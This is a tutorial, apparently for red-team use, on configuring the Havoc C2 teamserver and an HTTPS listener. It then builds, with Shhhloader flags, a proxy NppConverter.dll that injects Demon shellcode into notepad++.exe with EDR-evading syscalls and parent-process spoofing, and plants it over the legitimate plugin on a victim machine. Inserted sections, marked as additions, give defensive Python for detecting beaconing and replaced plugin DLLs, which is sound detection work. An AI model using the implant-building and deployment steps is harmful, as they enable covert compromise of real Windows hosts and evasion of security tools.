The teamserver needs a configuration profile (usually a .yml file) that defines parameters such as the IP address, port, user and password.
Create configuration profile.
In the folder teamserver/data, create the file config.yml with the profile below.

    Teamserver {
        Host = "0.0.0.0"
        Port = 40056

        Build {
            Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
            Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
            Nasm = "/usr/bin/nasm"
        }
    }

    Operators {
        user "at19n" {
            Password = "P@ssw0rd"
        }
    }

    # This block is optional; remove it if you do not use it.
    Service {
        Endpoint = "service-endpoint"
        Password = "service-password"
    }

    Demon {
        Sleep = 2
        Jitter = 15
        TrustXForwardedFor = false

        Injection {
            Spawn64 = "C:\\Windows\\System32\\notepad.exe"
            Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
        }
    }
Start Teamserver
Run the teamserver with the configuration profile.
Start Client
The client is the graphical interface used to interact with the teamserver.
From the folder client/build, run the client:
Setup Listener
A listener is the endpoint that receives connections from agents (Demons) on the victim machine.
In the client interface, navigate to Listeners -> Create Listeners.
An example listener configuration (HTTPS):
Name: at19n-test
Type: HTTPS
Host: IP address of the teamserver or redirector
Port: 443
Callback Interval: Time between callbacks (example: 5s)
Save and start the listener. If it succeeds, the listener shows the status "Active".
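A note on what the Sleep and Jitter values in the profile above look like from the other side of the wire, as an added example that is not part of the original page: a Demon configured with Sleep = 2 and Jitter = 15 calls back to the listener roughly every 2 s, and the inter-arrival times of those HTTPS connections therefore cluster tightly around the sleep value. The script below is the kind of regularity check a defender runs over outbound connection logs; it assumes jitter is applied as a plus or minus 15 % variation of the sleep, and all hostnames, addresses, timestamps and thresholds are constructed.

```python
"""Added example (not from the original page): regularity check over outbound
connection timestamps. A Demon profile with Sleep = 2 and Jitter = 15 calls back
about every 2 s with each wait varied by up to 15 % (assumption about how the
jitter is applied), so its inter-arrival times cluster around the sleep value.
All timestamps and thresholds below are constructed for the example."""
import random
import statistics
from collections import defaultdict

SLEEP_SECONDS = 2.0   # Demon "Sleep" from the profile above
JITTER = 0.15         # Demon "Jitter" (15 %) from the profile above


def inter_arrival(timestamps):
    """Gaps in seconds between consecutive sorted timestamps."""
    ts = sorted(timestamps)
    return [later - earlier for earlier, later in zip(ts, ts[1:])]


def beacon_score(timestamps, min_events=8):
    """Return (mean_gap, coefficient_of_variation), or None with too few events."""
    if len(timestamps) < min_events:
        return None
    gaps = inter_arrival(timestamps)
    mean = statistics.fmean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(events, max_cv=0.2, min_events=8):
    """events: iterable of (timestamp_s, src_host, dst_ip, dst_port).
    Returns (src_host, dst_ip, dst_port, mean_gap, cv) for each tuple whose
    connections are regular enough (cv <= max_cv) to look like a beacon."""
    by_tuple = defaultdict(list)
    for t, src, dst, port in events:
        by_tuple[(src, dst, port)].append(t)
    hits = []
    for (src, dst, port), ts in by_tuple.items():
        score = beacon_score(ts, min_events)
        if score is not None and score[1] <= max_cv:
            hits.append((src, dst, port, round(score[0], 3), round(score[1], 3)))
    return hits


def sample_events():
    """Constructed connection log: one host beaconing with the profile's
    sleep/jitter, one host browsing with irregular gaps. Seeded so it repeats."""
    rng = random.Random(1)
    events = []
    t = 0.0
    for _ in range(20):                      # beaconing host
        events.append((t, "ws01", "203.0.113.10", 443))
        t += SLEEP_SECONDS * (1 + rng.uniform(-JITTER, JITTER))
    t = 0.0
    for gap in [0.1, 5.0, 0.3, 40.0, 1.2, 0.05, 12.0, 3.3, 0.4, 25.0]:  # browsing host
        events.append((t, "ws02", "198.51.100.7", 443))
        t += gap
    return events


if __name__ == "__main__":
    for hit in find_beacons(sample_events()):
        print("possible beacon:", hit)
```

The coefficient of variation (standard deviation divided by mean) is what separates the two hosts: a bounded jitter of 15 % can never push it above about 0.15, while ordinary browsing produces gaps spread over orders of magnitude. A longer sleep simply moves the mean; the threshold on the coefficient stays the same, which is why this check is usually run per source/destination pair over a window long enough to collect a dozen or more connections.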
Hands on
Install Extensions
Extensions list
After clicking Install, the Havoc client automatically clones the Shhhloader source from GitHub.
Description: Shhhahoc is the name of the Shhhloader integration module for Havoc, which allows the use of advanced shellcode injection techniques to evade EDR/AV.
Features:
Uses SysWhispers (SysWhispers2, SysWhispers3, GetSyscallStub) to execute indirect syscalls
Supports injection methods such as PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC and ProcessHollow.
Shellcode encoding options and signing the output with a digital certificate to avoid detection.
Hands on
Create shellcode
Create and deploy a payload with Shhhloader
Use Shhhloader to inject the demon.x64.bin shellcode into the legitimate NppConverter.dll
Purpose:
Create a malicious DLL (NppConverter.dll) containing shellcode that connects back to the Havoc C2.
This DLL is loaded by notepad++.exe on startup and executes the shellcode via QueueUserAPC.
On the Windows machine, the legitimate NppConverter.dll is replaced with the malicious DLL to activate the payload.
/root/share/demon.x64.bin: Path to Demon shellcode
-sc GetSyscallStub: Use the GetSyscallStub syscall method to avoid EDR hooks
-m QueueUserAPC: Use QueueUserAPC as the shellcode injection method
-o /root/share/NppConverter.dll: The output file is NppConverter.dll (a malicious DLL)
-dp NppConverter.dll: Create a proxy DLL based on the legitimate NppConverter.dll
-pp explorer.exe: The parent process is explorer.exe
-p notepad++.exe: The target process for shellcode injection is notepad++.exe
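The swap described above leaves a file with the expected name, in the expected plugin folder, that notepad++.exe loads at startup as usual; what changes is the file's hash relative to the copy shipped with the application, and usually its signature status. The following is an added example, not code from the page or from the Shhhloader project, of the baseline comparison a defender applies to module-load telemetry (Sysmon's image-load events carry these fields) to catch such a replacement. The plugin paths, hashes, baseline and events are all constructed; the `fake_hash` helper only stands in for real file hashes.

```python
"""Added example (not from the original page or Shhhloader): baseline check over
module-load telemetry for a replaced plugin DLL. A proxied NppConverter.dll keeps
its name and path but no longer matches the hash of the genuine plugin, so the
same path with a different hash is the signal. Events, paths, hashes and the
baseline below are constructed for the example."""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class ImageLoad:
    process: str       # image that loaded the module, e.g. notepad++.exe
    module_path: str   # full path of the loaded DLL, as recorded by the sensor
    sha256: str        # hash of the file on disk, as recorded by the sensor
    signed: bool       # whether the sensor saw a valid Authenticode signature


def fake_hash(label: str) -> str:
    """Constructed stand-in for a real file hash, derived from a label."""
    return hashlib.sha256(label.encode()).hexdigest()


PLUGIN_DIR = r"c:\program files\notepad++\plugins"   # constructed install path

# Constructed baseline: lower-cased plugin path -> SHA-256 of the DLL as shipped.
BASELINE = {
    PLUGIN_DIR + r"\nppconverter\nppconverter.dll": fake_hash("NppConverter.dll (genuine)"),
    PLUGIN_DIR + r"\mimetools\mimetools.dll": fake_hash("mimeTools.dll (genuine)"),
}


def classify(ev: ImageLoad, baseline=BASELINE):
    """Return a verdict string for a suspicious plugin load, or None if benign."""
    path = ev.module_path.lower()
    if not path.startswith(PLUGIN_DIR):
        return None                          # only the plugin folder is baselined here
    expected = baseline.get(path)
    if expected is None:
        # A plugin the baseline has never seen; signature status sets the severity.
        return "new-signed-plugin" if ev.signed else "new-unsigned-plugin"
    if ev.sha256.lower() != expected:
        return "plugin-hash-mismatch"        # same name and path, different bytes
    return None


def scan(events, baseline=BASELINE):
    """Apply classify() to every event and keep only the findings."""
    findings = []
    for ev in events:
        verdict = classify(ev, baseline)
        if verdict is not None:
            findings.append((ev.process, ev.module_path, verdict))
    return findings


def sample_events():
    """Constructed image-load events for one notepad++.exe start-up."""
    npp = r"C:\Program Files\Notepad++\plugins"
    return [
        ImageLoad("notepad++.exe", npp + r"\mimeTools\mimeTools.dll",
                  BASELINE[PLUGIN_DIR + r"\mimetools\mimetools.dll"], False),
        ImageLoad("notepad++.exe", npp + r"\NppConverter\NppConverter.dll",
                  fake_hash("rebuilt proxy DLL"), False),      # replaced plugin
        ImageLoad("notepad++.exe", r"C:\Windows\System32\kernel32.dll",
                  fake_hash("kernel32.dll"), True),             # outside plugin dir
        ImageLoad("notepad++.exe", npp + r"\Extra\Extra.dll",
                  fake_hash("Extra.dll"), True),                # not in baseline
    ]


if __name__ == "__main__":
    for finding in scan(sample_events()):
        print(*finding)
```

Two design points matter here. The genuine mimeTools.dll is unsigned in the constructed data and still passes, because the hash match is the authoritative check and many legitimate plugins are unsigned; signature status is only used to rank plugins the baseline has never seen. And the comparison is keyed on the normalised path, so a DLL that has been rebuilt but keeps its original name and location, which is exactly the case on this page, produces a hash mismatch rather than slipping through as a "known" module.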